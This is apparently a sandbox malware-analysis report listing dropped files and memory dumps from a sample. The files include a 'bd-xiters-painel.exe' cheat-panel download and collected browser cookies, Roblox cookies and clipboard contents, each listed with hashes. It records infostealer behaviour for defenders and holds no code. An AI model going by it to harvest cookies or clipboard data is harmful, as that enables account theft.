C:\Users\Admin\AppData\Local\Temp\sZ2LO3C4i6\Browser\cookies.txt

Filesize
49B

MD5
357c18b5c470aa5214819ed2e11882f9

SHA1
262726528ac6ece5ef69b48cbf69e9d3c79bbc2d

SHA256
e04233c3a65810f382471c2c1484cc71df6f2078d56bd91f478ed99790ac11f5

SHA512
a84eaa0f8466ef145e765b3c340120a7947aad6ded63c301be5a5c4dea15f603ae0a295c8d7d9828a8f660edfa058edf96abc6950eebbbafe3af402a4b37d683

Download Submit
C:\Users\Admin\AppData\Local\Temp\sZ2LO3C4i6\Browser\roblox cookies.txt

Filesize
23B

MD5
de9ec9fc7c87635cb91e05c792e94140

SHA1
3f0fbeaff23a30040e5f52b78b474e7cb23488ab

SHA256
aac2a87a65cbbe472000734bd6db5c76f0ffed78e80928f575d5573f3ac94d0f

SHA512
a18ff0f277d880cf249fe7ef20fa026fd8126121fbb6f1de33d3d4a08d37084c662724053c6e8e2035aa7c347000e14a9c12698017ac72b327db6473d6e4af56

Download Submit
C:\Users\Admin\AppData\Local\Temp\sZ2LO3C4i6\Clipboard\clipboard.txt

Filesize
18B

MD5
3f86226eca1b8b351d9c5b11dcdbcdfa

SHA1
576f70164e26ad8dbdb346cd72c26323f10059ac

SHA256
0d50f046634b25bcfc3ffb0a9feff8ab43e662c8872df933cb15b68050a5bb8c

SHA512
150d95510e0f83ef0e416e1a18663a70f85ff4d09c620fcf355b18df3e939d232054a5be5bbb1b22e050167e61c243d7e89e13c0770cfedbae49b1b8e10d8753

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 153569.crdownload

Filesize
15.6MB

MD5
8f59bcfd797ced11bfc66d2ca6933682

SHA1
f9c4332a51246f8dacc78e294df9802a3dfb9bf8

SHA256
ab3a3a944b8e6c60f4eeed5bd04235852e675aedc6ed0d68cd4711641e2a00f5

SHA512
1678ef9c35427ce86aa8d8e6cdeac11be70e950c9952012c7d6742df6e4cd50df1dfab3c7609983c20b01d41bcef69ac2874519b5c668a8799b5be496ec0371e

Download Submit
C:\Users\Admin\Downloads\bd-xiters-painel\bd-xiters-painel.exe

Filesize
15.8MB

MD5
7afb47727dfab45745f24a8c8ef33294

SHA1
6870bf67642e4ff618abed5a9510d1e7d7e7dd4e

SHA256
fca568185b42294a723271853b3edec30a2cee6eef8c8da1cefe7ff41605da03

SHA512
1758a43d3af3ae3923e314ef344cd7936c54e8f89e5c25a5a8a9bb5d0a560ce565525bc8517dbdf5fb25514049aae20ece305326bb6199feb6c1252a00f4d73a

Download Submit
memory/1984-286-0x000001EFA1010000-0x000001EFA1032000-memory.dmp

Filesize
136KB

Download
memory/3532-586-0x00007FFB57F00000-0x00007FFB57F0F000-memory.dmp

Filesize
60KB

Download
memory/3532-585-0x00007FFB56370000-0x00007FFB56395000-memory.dmp

Filesize
148KB

Download
memory/3532-588-0x00007FFB520F0000-0x00007FFB5211D000-memory.dmp

Filesize
180KB

Download
memory/3532-589-0x00007FFB56360000-0x00007FFB5636F000-memory.dmp

Filesize
60KB

Download
memory/3532-590-0x00007FFB51FA0000-0x00007FFB51FD6000-memory.dmp

Filesize
216KB

Download
memory/3532-591-0x00007FFB51F80000-0x00007FFB51F99000-memory.dmp

Filesize
100KB

Download
memory/3532-587-0x00007FFB561F0000-0x00007FFB5620A000-memory.dmp

Filesize
104KB

Download
memory/3532-584-0x00007FFB42370000-0x00007FFB42A34000-memory.dmp

Filesize
6.8MB

Download
memory/3532-592-0x00007FFB561D0000-0x00007FFB561DD000-memory.dmp

Filesize
52KB

Download
memory/3532-594-0x00007FFB51F60000-0x00007FFB51F74000-memory.dmp

Filesize
80KB

Download
memory/3532-593-0x00007FFB55C00000-0x00007FFB55C0D000-memory.dmp

Filesize
52KB

Download
memory/3640-256-0x00007FFB3EBB0000-0x00007FFB3EBBC000-memory.dmp

Filesize
48KB

Download
memory/3640-438-0x00007FFB41130000-0x00007FFB41146000-memory.dmp

Filesize
88KB

Download
memory/3640-245-0x00007FFB3ED20000-0x00007FFB3ED47000-memory.dmp

Filesize
156KB

Download
memory/3640-246-0x00007FFB3EC00000-0x00007FFB3ED1B000-memory.dmp

Filesize
1.1MB

Download
memory/3640-244-0x00007FFB49440000-0x00007FFB4944B000-memory.dmp

Filesize
44KB

Download
memory/3640-252-0x00007FFB48D40000-0x00007FFB48D54000-memory.dmp

Filesize
80KB

Download
memory/3640-251-0x00007FFB55C00000-0x00007FFB55C0F000-memory.dmp

Filesize
60KB

Download
memory/3640-253-0x00007FFB3F2B0000-0x00007FFB3F7D9000-memory.dmp

Filesize
5.2MB

Download
memory/3640-267-0x00007FFB3EB20000-0x00007FFB3EB32000-memory.dmp

Filesize
72KB

Download
memory/3640-266-0x00007FFB43370000-0x00007FFB433A3000-memory.dmp

Filesize
204KB

Download
memory/3640-265-0x00007FFB3EBD0000-0x00007FFB3EBDB000-memory.dmp

Filesize
44KB

Download
memory/3640-264-0x00007FFB3EBE0000-0x00007FFB3EBEC000-memory.dmp

Filesize
48KB

Download
memory/3640-263-0x00007FFB3EB40000-0x00007FFB3EB4D000-memory.dmp

Filesize
52KB

Download
memory/3640-262-0x00007FFB3EB50000-0x00007FFB3EB5C000-memory.dmp

Filesize
48KB

Download
memory/3640-261-0x00007FFB3EB60000-0x00007FFB3EB6C000-memory.dmp

Filesize
48KB

Download
memory/3640-260-0x00007FFB3EB70000-0x00007FFB3EB7B000-memory.dmp

Filesize
44KB

Download
memory/3640-259-0x00007FFB3EB80000-0x00007FFB3EB8B000-memory.dmp

Filesize
44KB

Download
memory/3640-258-0x00007FFB3EB90000-0x00007FFB3EB9C000-memory.dmp

Filesize
48KB

Download
memory/3640-257-0x00007FFB3EBA0000-0x00007FFB3EBAE000-memory.dmp

Filesize
56KB

Download
memory/3640-269-0x00007FFB3EB10000-0x00007FFB3EB1C000-memory.dmp

Filesize
48KB

Download
memory/3640-268-0x00007FFB3F1E0000-0x00007FFB3F2AD000-memory.dmp

Filesize
820KB

Download
memory/3640-242-0x00007FFB3ED50000-0x00007FFB3ED68000-memory.dmp

Filesize
96KB

Download
memory/3640-255-0x00007FFB3EBC0000-0x00007FFB3EBCC000-memory.dmp

Filesize
48KB

Download
memory/3640-254-0x00007FFB3EBF0000-0x00007FFB3EBFB000-memory.dmp

Filesize
44KB

Download
memory/3640-250-0x00007FFB41120000-0x00007FFB4112C000-memory.dmp

Filesize
48KB

Download
memory/3640-249-0x00007FFB43360000-0x00007FFB4336B000-memory.dmp

Filesize
44KB

Download
memory/3640-248-0x00007FFB439C0000-0x00007FFB439CB000-memory.dmp

Filesize
44KB

Download
memory/3640-247-0x00007FFB4A6D0000-0x00007FFB4A6FD000-memory.dmp

Filesize
180KB

Download
memory/3640-270-0x00007FFB3E8C0000-0x00007FFB3EB09000-memory.dmp

Filesize
2.3MB

Download
memory/3640-273-0x00007FFB3E850000-0x00007FFB3E87E000-memory.dmp

Filesize
184KB

Download
memory/3640-272-0x00007FFB3E880000-0x00007FFB3E8A9000-memory.dmp

Filesize
164KB

Download
memory/3640-240-0x00007FFB3EEF0000-0x00007FFB3EF14000-memory.dmp

Filesize
144KB

Download
memory/3640-241-0x00007FFB3ED70000-0x00007FFB3EEEF000-memory.dmp

Filesize
1.5MB

Download
memory/3640-330-0x00007FFB3EEF0000-0x00007FFB3EF14000-memory.dmp

Filesize
144KB

Download
memory/3640-331-0x00007FFB3ED70000-0x00007FFB3EEEF000-memory.dmp

Filesize
1.5MB

Download
memory/3640-342-0x00007FFB3F7E0000-0x00007FFB3FEA4000-memory.dmp

Filesize
6.8MB

Download
memory/3640-359-0x00007FFB3ED70000-0x00007FFB3EEEF000-memory.dmp

Filesize
1.5MB

Download
memory/3640-354-0x00007FFB43370000-0x00007FFB433A3000-memory.dmp

Filesize
204KB

Download
memory/3640-343-0x00007FFB51E30000-0x00007FFB51E55000-memory.dmp

Filesize
148KB

Download
memory/3640-238-0x00007FFB3EF20000-0x00007FFB3EF32000-memory.dmp

Filesize
72KB

Download
memory/3640-236-0x00007FFB41130000-0x00007FFB41146000-memory.dmp

Filesize
88KB

Download
memory/3640-387-0x00007FFB576A0000-0x00007FFB576AF000-memory.dmp

Filesize
60KB

Download
memory/3640-397-0x00007FFB43A80000-0x00007FFB43AB6000-memory.dmp

Filesize
216KB

Download
memory/3640-444-0x00007FFB3ED20000-0x00007FFB3ED47000-memory.dmp

Filesize
156KB

Download
memory/3640-443-0x00007FFB49440000-0x00007FFB4944B000-memory.dmp

Filesize
44KB

Download
memory/3640-442-0x00007FFB3ED50000-0x00007FFB3ED68000-memory.dmp

Filesize
96KB

Download
memory/3640-441-0x00007FFB3ED70000-0x00007FFB3EEEF000-memory.dmp

Filesize
1.5MB

Download
memory/3640-440-0x00007FFB3EEF0000-0x00007FFB3EF14000-memory.dmp

Filesize
144KB

Download
memory/3640-439-0x00007FFB3EF20000-0x00007FFB3EF32000-memory.dmp

Filesize
72KB

Download
memory/3640-243-0x00007FFB3F7E0000-0x00007FFB3FEA4000-memory.dmp

Filesize
6.8MB

Download
memory/3640-437-0x00007FFB3F1E0000-0x00007FFB3F2AD000-memory.dmp

Filesize
820KB

Download
memory/3640-436-0x00007FFB43370000-0x00007FFB433A3000-memory.dmp

Filesize
204KB

Download
memory/3640-435-0x00007FFB3EBD0000-0x00007FFB3EBDB000-memory.dmp

Filesize
44KB

Download
memory/3640-434-0x00007FFB48D40000-0x00007FFB48D54000-memory.dmp

Filesize
80KB

Download
memory/3640-433-0x00007FFB51F30000-0x00007FFB51F3D000-memory.dmp

Filesize
52KB

Download
memory/3640-445-0x00007FFB3EB80000-0x00007FFB3EB8B000-memory.dmp

Filesize
44KB

Download
memory/3640-432-0x00007FFB52080000-0x00007FFB5208D000-memory.dmp

Filesize
52KB

Download
memory/3640-431-0x00007FFB4FF00000-0x00007FFB4FF19000-memory.dmp

Filesize
100KB

Download
memory/3640-430-0x00007FFB3EBE0000-0x00007FFB3EBEC000-memory.dmp

Filesize
48KB

Download
memory/3640-429-0x00007FFB55C00000-0x00007FFB55C0F000-memory.dmp

Filesize
60KB

Download
memory/3640-428-0x00007FFB41120000-0x00007FFB4112C000-memory.dmp

Filesize
48KB

Download
memory/3640-449-0x00007FFB3EB40000-0x00007FFB3EB4D000-memory.dmp

Filesize
52KB

Download
memory/3640-448-0x00007FFB3EB20000-0x00007FFB3EB32000-memory.dmp

Filesize
72KB

Download
memory/3640-447-0x00007FFB3EB60000-0x00007FFB3EB6C000-memory.dmp

Filesize
48KB

Download
memory/3640-446-0x00007FFB3EB70000-0x00007FFB3EB7B000-memory.dmp

Filesize
44KB

Download
memory/3640-452-0x00007FFB3EB10000-0x00007FFB3EB1C000-memory.dmp

Filesize
48KB

Download
memory/3640-455-0x00007FFB3E850000-0x00007FFB3E87E000-memory.dmp

Filesize
184KB

Download
memory/3640-454-0x00007FFB3E880000-0x00007FFB3E8A9000-memory.dmp

Filesize
164KB

Download
memory/3640-453-0x00007FFB3E8C0000-0x00007FFB3EB09000-memory.dmp

Filesize
2.3MB

Download
memory/3640-451-0x00007FFB3EB50000-0x00007FFB3EB5C000-memory.dmp

Filesize
48KB

Download
memory/3640-450-0x00007FFB3F2B0000-0x00007FFB3F7D9000-memory.dmp

Filesize
5.2MB

Download
memory/3640-427-0x00007FFB51270000-0x00007FFB5128A000-memory.dmp

Filesize
104KB

Download
memory/3640-426-0x00007FFB561D0000-0x00007FFB561DF000-memory.dmp

Filesize
60KB

Download
memory/3640-425-0x00007FFB51E30000-0x00007FFB51E55000-memory.dmp

Filesize
148KB

Download
memory/3640-424-0x00007FFB43360000-0x00007FFB4336B000-memory.dmp

Filesize
44KB

Download
memory/3640-423-0x00007FFB576A0000-0x00007FFB576AF000-memory.dmp

Filesize
60KB

Download
memory/3640-422-0x00007FFB3EB90000-0x00007FFB3EB9C000-memory.dmp

Filesize
48KB

Download
memory/3640-421-0x00007FFB3EBA0000-0x00007FFB3EBAE000-memory.dmp

Filesize
56KB

Download
memory/3640-420-0x00007FFB3EBB0000-0x00007FFB3EBBC000-memory.dmp

Filesize
48KB

Download
memory/3640-419-0x00007FFB3EBC0000-0x00007FFB3EBCC000-memory.dmp

Filesize
48KB

Download
memory/3640-416-0x00007FFB3EBF0000-0x00007FFB3EBFB000-memory.dmp

Filesize
44KB

Download
memory/3640-413-0x00007FFB439C0000-0x00007FFB439CB000-memory.dmp

Filesize
44KB

Download
memory/3640-412-0x00007FFB3EC00000-0x00007FFB3ED1B000-memory.dmp

Filesize
1.1MB

Download
memory/3640-395-0x00007FFB4A6D0000-0x00007FFB4A6FD000-memory.dmp

Filesize
180KB

Download
memory/3640-391-0x00007FFB3F7E0000-0x00007FFB3FEA4000-memory.dmp

Filesize
6.8MB

Download
memory/3640-231-0x00007FFB3F1E0000-0x00007FFB3F2AD000-memory.dmp

Filesize
820KB

Download
memory/3640-229-0x00007FFB43370000-0x00007FFB433A3000-memory.dmp

Filesize
204KB

Download
memory/3640-221-0x00007FFB55C00000-0x00007FFB55C0F000-memory.dmp

Filesize
60KB

Download
memory/3640-222-0x00007FFB43A80000-0x00007FFB43AB6000-memory.dmp

Filesize
216KB

Download
memory/3640-223-0x00007FFB4FF00000-0x00007FFB4FF19000-memory.dmp

Filesize
100KB

Download
memory/3640-224-0x00007FFB52080000-0x00007FFB5208D000-memory.dmp

Filesize
52KB

Download
memory/3640-225-0x00007FFB51F30000-0x00007FFB51F3D000-memory.dmp

Filesize
52KB

Download
memory/3640-226-0x00007FFB48D40000-0x00007FFB48D54000-memory.dmp

Filesize
80KB

Download
memory/3640-227-0x00007FFB3F2B0000-0x00007FFB3F7D9000-memory.dmp

Filesize
5.2MB

Download
memory/3640-192-0x00007FFB51270000-0x00007FFB5128A000-memory.dmp

Filesize
104KB

Download
memory/3640-193-0x00007FFB4A6D0000-0x00007FFB4A6FD000-memory.dmp

Filesize
180KB

Download
memory/3640-186-0x00007FFB51E30000-0x00007FFB51E55000-memory.dmp

Filesize
148KB

Download
memory/3640-187-0x00007FFB561D0000-0x00007FFB561DF000-memory.dmp

Filesize
60KB

Download
memory/3640-177-0x00007FFB3F7E0000-0x00007FFB3FEA4000-memory.dmp

Filesize
6.8MB

Download